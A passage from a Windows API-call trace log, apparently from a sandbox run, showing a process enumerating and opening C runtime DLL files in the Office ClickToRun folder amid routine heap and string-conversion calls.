Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.341] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.341] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0074.341] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0074.341] AreFileApisANSI () returned 1 [0074.341] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-heap-l1-1-0.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-heap-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 89 [0074.341] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0074.341] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.341] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.341] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0074.341] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0074.341] AreFileApisANSI () returned 1 [0074.341] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 89 [0074.341] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb2) returned 0x5a6b8 [0074.341] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=89 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-heap-l1-1-0.dll") returned 89 [0074.341] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-heap-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0074.341] GetFileType (hFile=0x430) returned 0x1 [0074.341] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.342] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0074.342] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0074.342] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0074.342] CloseHandle (hObject=0x430) returned 1 [0074.342] AreFileApisANSI () returned 1 [0074.342] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 89 [0074.342] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb2) returned 0x5a6b8 [0074.342] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=89 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-heap-l1-1-0.dll") returned 89 [0074.342] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-heap-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0074.342] GetFileType (hFile=0x430) returned 0x1 [0074.342] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.343] CloseHandle (hObject=0x430) returned 1 [0074.343] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0074.343] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0074.343] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.343] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0074.343] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.343] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0074.343] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0074.343] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0074.343] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0074.343] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0074.343] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.343] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0074.343] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0074.343] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0074.343] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0074.343] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0074.343] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0074.343] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0074.343] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0074.343] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0074.343] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0074.343] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.343] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0074.343] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0074.343] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.343] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0074.343] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0074.343] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0074.344] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.344] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0074.344] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0074.344] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0074.344] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0074.344] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0074.344] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x32318 [0074.344] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0074.344] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0074.344] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0074.344] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0074.344] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x32318 | out: hHeap=0x20000) returned 1 [0074.344] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x32318 [0074.344] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0074.344] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0074.344] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0074.344] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0074.344] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0074.344] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x32318 | out: hHeap=0x20000) returned 1 [0074.344] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0074.344] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0074.344] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0074.344] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0074.344] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0074.344] AreFileApisANSI () returned 1 [0074.344] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 89 [0074.344] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb2) returned 0x5a6b8 [0074.344] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=89 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-heap-l1-1-0.dll") returned 89 [0074.344] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-heap-l1-1-0.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x4cc0)) returned 1 [0074.344] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.344] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0074.344] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0074.344] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0074.345] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.345] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.345] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x4ac0, dwReserved0=0x313f518, dwReserved1=0x2000002, cFileName="api-ms-win-crt-locale-l1-1-0.dll", cAlternateFileName="APCB40~1.DLL")) returned 1 [0074.345] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0074.345] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0074.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0074.345] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x694e0 [0074.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0074.345] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d790 [0074.345] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0074.345] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0074.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0074.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d790 | out: hHeap=0x20000) returned 1 [0074.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x694e0 | out: hHeap=0x20000) returned 1 [0074.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0074.345] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0074.345] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0074.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0074.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0074.345] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0074.345] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0074.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0074.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0074.345] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d160 [0074.345] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ecf0 [0074.345] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0074.345] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x5a6b8 [0074.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ecf0 | out: hHeap=0x20000) returned 1 [0074.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0074.345] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x80a30 [0074.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.345] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.345] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.345] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.345] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0074.346] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d160 | out: hHeap=0x20000) returned 1 [0074.346] AreFileApisANSI () returned 1 [0074.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 91 [0074.346] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0074.346] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.346] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.346] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0074.346] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0074.346] AreFileApisANSI () returned 1 [0074.346] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 91 [0074.346] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb6) returned 0x5a6b8 [0074.346] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71688, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=91 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll") returned 91 [0074.346] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-locale-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0074.346] GetFileType (hFile=0x430) returned 0x1 [0074.346] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.346] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0074.346] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0074.347] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0074.347] CloseHandle (hObject=0x430) returned 1 [0074.347] AreFileApisANSI () returned 1 [0074.347] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 91 [0074.347] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb6) returned 0x5a6b8 [0074.347] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71688, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=91 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll") returned 91 [0074.347] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-locale-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0074.347] GetFileType (hFile=0x430) returned 0x1 [0074.347] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.347] CloseHandle (hObject=0x430) returned 1 [0074.347] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0074.347] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0074.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0074.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0074.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0074.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0074.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0074.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0074.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0074.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0074.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0074.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0074.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0074.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0074.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0074.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0074.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0074.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0074.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0074.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0074.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0074.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0074.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0074.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0074.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0074.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d6e0 [0074.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0074.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d528 [0074.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0074.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d6e0 | out: hHeap=0x20000) returned 1 [0074.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0074.349] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0074.349] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0074.349] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0074.349] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0074.349] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d210 [0074.349] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd98 [0074.349] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d210 | out: hHeap=0x20000) returned 1 [0074.349] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0074.349] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0074.349] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0074.349] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0074.349] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d6e0 [0074.349] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0074.349] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d6e0 | out: hHeap=0x20000) returned 1 [0074.349] AreFileApisANSI () returned 1 [0074.349] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 91 [0074.349] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb6) returned 0x5a6b8 [0074.349] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71688, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=91 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll") returned 91 [0074.349] 